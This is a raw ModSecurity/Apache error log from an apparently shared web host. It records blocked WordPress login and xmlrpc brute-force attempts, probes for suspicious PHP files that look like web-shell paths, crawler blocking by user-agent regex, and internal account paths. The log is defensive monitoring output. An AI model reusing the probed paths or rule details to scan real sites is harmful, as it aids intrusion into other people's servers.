[Tue May 26 18:56:10.298324 2026] [security2:error] [pid 1036960:tid 1037181] [client 20.206.67.134:2340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/ceihuypp.php"] [unique_id "ahWfcoGNKXNii6nttH9tiwAAAOA"], referer: www.google.com
[Tue May 26 18:56:10.709217 2026] [security2:error] [pid 1036960:tid 1037127] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfcoGNKXNii6nttH9tjgAAAKo"]
[Tue May 26 18:56:12.854085 2026] [security2:error] [pid 1036960:tid 1037141] [client 43.173.173.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWfdIGNKXNii6nttH9t0gAAALg"]
[Tue May 26 18:56:13.358021 2026] [security2:error] [pid 1036960:tid 1037116] [client 20.206.67.134:2650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-plain.php"] [unique_id "ahWfdYGNKXNii6nttH9t4AAAAJ8"], referer: www.google.com
[Tue May 26 18:56:13.395060 2026] [security2:error] [pid 1036960:tid 1037184] [client 20.206.67.134:2641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWfdYGNKXNii6nttH9t4QAAAOM"], referer: www.google.com
[Tue May 26 18:56:13.454452 2026] [security2:error] [pid 1036960:tid 1037174] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfdYGNKXNii6nttH9t3gAAANk"]
[Tue May 26 18:56:15.087232 2026] [security2:error] [pid 1036960:tid 1037093] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfdoGNKXNii6nttH9uBQAAAIg"]
[Tue May 26 18:56:16.530698 2026] [security2:error] [pid 1036960:tid 1037123] [client 20.206.67.134:2635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/qmdvlxwi.php"] [unique_id "ahWfeIGNKXNii6nttH9uMQAAAKY"], referer: www.google.com
[Tue May 26 18:56:17.405000 2026] [security2:error] [pid 1036960:tid 1037143] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfeIGNKXNii6nttH9uPwAAALo"]
[Tue May 26 18:56:18.746142 2026] [security2:error] [pid 1036960:tid 1036978] [remote 222.165.190.235:50344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWfeoGNKXNii6nttH9uYgABARE"]
[Tue May 26 18:56:19.731674 2026] [security2:error] [pid 1036960:tid 1036991] [remote 222.165.190.235:50344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWfe4GNKXNii6nttH9ufAAAkR4"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:56:19.773454 2026] [security2:error] [pid 1036960:tid 1037140] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfe4GNKXNii6nttH9uewAAALc"]
[Tue May 26 18:56:20.446085 2026] [security2:error] [pid 1036960:tid 1036996] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWffIGNKXNii6nttH9ujQAA2yM"]
[Tue May 26 18:56:20.446270 2026] [security2:error] [pid 1036960:tid 1037176] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWffIGNKXNii6nttH9ujQAA2yM"]
[Tue May 26 18:56:20.866371 2026] [security2:error] [pid 1036960:tid 1036999] [remote 111.229.141.137:35666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWffIGNKXNii6nttH9ukgAAyCY"]
[Tue May 26 18:56:21.348441 2026] [security2:error] [pid 1036960:tid 1037135] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWffIGNKXNii6nttH9ungAAALI"]
[Tue May 26 18:56:21.484977 2026] [security2:error] [pid 1036960:tid 1037118] [client 185.191.171.15:14392] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/neon/list/"] [unique_id "ahWffYGNKXNii6nttH9urwAAAKE"]
[Tue May 26 18:56:21.485078 2026] [security2:error] [pid 1036960:tid 1037118] [client 185.191.171.15:14392] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/neon/list/"] [unique_id "ahWffYGNKXNii6nttH9urwAAAKE"]
[Tue May 26 18:56:22.345493 2026] [security2:error] [pid 1036960:tid 1037164] [client 185.80.142.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWffYGNKXNii6nttH9uuwAAAM8"]
[Tue May 26 18:56:24.732477 2026] [security2:error] [pid 1036960:tid 1037109] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfgIGNKXNii6nttH9u_gAAAJg"]
[Tue May 26 18:56:24.963742 2026] [security2:error] [pid 1036960:tid 1037005] [remote 52.18.195.140:42604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfgIGNKXNii6nttH9vCwAAuiw"]
[Tue May 26 18:56:25.513905 2026] [security2:error] [pid 1036960:tid 1037131] [client 3.77.67.4:23466] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWfgYGNKXNii6nttH9vGwAAAK4"], referer: https://thegoodsporting.com
[Tue May 26 18:56:25.860925 2026] [security2:error] [pid 1036960:tid 1037013] [remote 52.18.195.140:42604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfgYGNKXNii6nttH9vKQAA-zQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:56:26.626741 2026] [security2:error] [pid 1036960:tid 1037165] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfgoGNKXNii6nttH9vNAAAANA"]
[Tue May 26 18:56:28.320463 2026] [security2:error] [pid 1036960:tid 1037208] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfg4GNKXNii6nttH9vXQAAAPs"]
[Tue May 26 18:56:29.634092 2026] [security2:error] [pid 1036960:tid 1037207] [client 114.119.138.98:21191] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "senoro.com.mx"] [uri "/wp-content/uploads/2015/10/senoro02.jpg"] [unique_id "ahWfhYGNKXNii6nttH9viQAAAPo"], referer: http://senoro.com.mx/wp-content/uploads/2015/10/senoro02.jpg
[Tue May 26 18:56:31.159670 2026] [security2:error] [pid 1036960:tid 1037159] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfhoGNKXNii6nttH9voAAAAMo"]
[Tue May 26 18:56:31.232176 2026] [security2:error] [pid 1036960:tid 1037041] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfh4GNKXNii6nttH9vqwAAwFA"]
[Tue May 26 18:56:31.232327 2026] [security2:error] [pid 1036960:tid 1037149] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfh4GNKXNii6nttH9vqwAAwFA"]
[Tue May 26 18:56:32.933895 2026] [core:alert] [pid 1036960:tid 1037176] [client 66.132.195.77:0] /home2/debatqhn/enattafoodparcel.org/.htaccess: </IfModule> without matching <IfModule> section
[Tue May 26 18:56:33.176529 2026] [security2:error] [pid 1036960:tid 1037182] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfiIGNKXNii6nttH9vyAAAAOE"]
[Tue May 26 18:56:34.093686 2026] [security2:error] [pid 1036960:tid 1037038] [remote 222.165.190.235:53288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfioGNKXNii6nttH9v8gAAwU0"]
[Tue May 26 18:56:34.537471 2026] [security2:error] [pid 1036960:tid 1037027] [remote 222.165.190.235:53288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfioGNKXNii6nttH9wAQAA1kI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:56:34.549735 2026] [security2:error] [pid 1036960:tid 1037058] [remote 74.7.241.58:38008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWfioGNKXNii6nttH9wAAAA72E"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/mailchimp-for-wp/integrations/ninja-forms
[Tue May 26 18:56:35.768185 2026] [security2:error] [pid 1036960:tid 1037097] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfi4GNKXNii6nttH9wHAAAAIw"]
[Tue May 26 18:56:36.714122 2026] [security2:error] [pid 1036960:tid 1037047] [remote 41.111.171.131:37680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.171.111.41.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWfjIGNKXNii6nttH9wMQAAolY"]
[Tue May 26 18:56:38.091123 2026] [security2:error] [pid 1036960:tid 1037113] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfjYGNKXNii6nttH9wSQAAAJw"]
[Tue May 26 18:56:40.255191 2026] [security2:error] [pid 1036960:tid 1037173] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfj4GNKXNii6nttH9whQAAANg"]
[Tue May 26 18:56:41.813638 2026] [security2:error] [pid 1036960:tid 1037071] [remote 49.12.3.147:49396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWfkYGNKXNii6nttH9wvwABAm4"]
[Tue May 26 18:56:42.077563 2026] [security2:error] [pid 1036960:tid 1037111] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfkYGNKXNii6nttH9wxAAAAJo"]
[Tue May 26 18:56:42.183834 2026] [security2:error] [pid 1036960:tid 1037088] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfkoGNKXNii6nttH9w1AABA38"]
[Tue May 26 18:56:42.184058 2026] [security2:error] [pid 1036960:tid 1037216] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfkoGNKXNii6nttH9w1AABA38"]
[Tue May 26 18:56:43.017742 2026] [security2:error] [pid 1036960:tid 1037072] [remote 78.142.18.172:59936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWfkoGNKXNii6nttH9w5gAA6G8"]
[Tue May 26 18:56:43.252436 2026] [security2:error] [pid 1036960:tid 1037082] [remote 78.142.18.172:59936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWfk4GNKXNii6nttH9w8wABBHk"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 18:56:45.047451 2026] [security2:error] [pid 1036960:tid 1037175] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWflIGNKXNii6nttH9xJgAAANo"]
[Tue May 26 18:56:45.594642 2026] [security2:error] [pid 1036960:tid 1037216] [client 14.232.111.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWflYGNKXNii6nttH9xOwAAAQM"]
[Tue May 26 18:56:46.729092 2026] [security2:error] [pid 1036960:tid 1037198] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfloGNKXNii6nttH9xXgAAAPE"]
[Tue May 26 18:56:47.912865 2026] [security2:error] [pid 1036960:tid 1036979] [remote 18.219.113.49:58344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWfl4GNKXNii6nttH9xewAAkRI"]
[Tue May 26 18:56:48.595313 2026] [fcgid:warn] [pid 1036960:tid 1037175] (70014)End of file found: [client 66.132.195.65:17160] mod_fcgid: can't get data from http client
[Tue May 26 18:56:49.032022 2026] [security2:error] [pid 1036960:tid 1037181] [client 66.249.64.34:36775] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfmIGNKXNii6nttH9xhgAAAOA"], referer: https://mosykay.com/prizes/227717955
[Tue May 26 18:56:49.087999 2026] [security2:error] [pid 1036960:tid 1037215] [client 148.113.128.48:38220] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWfmYGNKXNii6nttH9xngAAAQI"]
[Tue May 26 18:56:49.088106 2026] [security2:error] [pid 1036960:tid 1037215] [client 148.113.128.48:38220] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWfmYGNKXNii6nttH9xngAAAQI"]
[Tue May 26 18:56:49.744502 2026] [security2:error] [pid 1036960:tid 1037212] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfmYGNKXNii6nttH9xpAAAAP8"]
[Tue May 26 18:56:50.443375 2026] [security2:error] [pid 1036960:tid 1037099] [client 167.114.139.165:50378] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahWfmoGNKXNii6nttH9xwQAAAI4"]
[Tue May 26 18:56:50.443489 2026] [security2:error] [pid 1036960:tid 1037099] [client 167.114.139.165:50378] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahWfmoGNKXNii6nttH9xwQAAAI4"]
[Tue May 26 18:56:51.049203 2026] [security2:error] [pid 1036960:tid 1037011] [remote 18.219.113.49:58344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWfmoGNKXNii6nttH9xyAAA2TI"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 18:56:51.290948 2026] [security2:error] [pid 1036960:tid 1037167] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfmoGNKXNii6nttH9xxwAAANI"]
[Tue May 26 18:56:51.329280 2026] [core:crit] [pid 1036960:tid 1037123] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:56:52.728920 2026] [security2:error] [pid 1036960:tid 1037077] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfnIGNKXNii6nttH9x8wABA3Q"]
[Tue May 26 18:56:52.729108 2026] [security2:error] [pid 1036960:tid 1037216] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfnIGNKXNii6nttH9x8wABA3Q"]
[Tue May 26 18:56:53.592881 2026] [security2:error] [pid 1036960:tid 1037185] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfnYGNKXNii6nttH9x_gAAAOQ"]
[Tue May 26 18:56:56.734701 2026] [security2:error] [pid 1036960:tid 1037174] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfoIGNKXNii6nttH9yMQAAANk"]
[Tue May 26 18:56:57.100978 2026] [security2:error] [pid 1036960:tid 1037172] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfoYGNKXNii6nttH9yRgAAANc"], referer: https://www.anujtradingco.com/
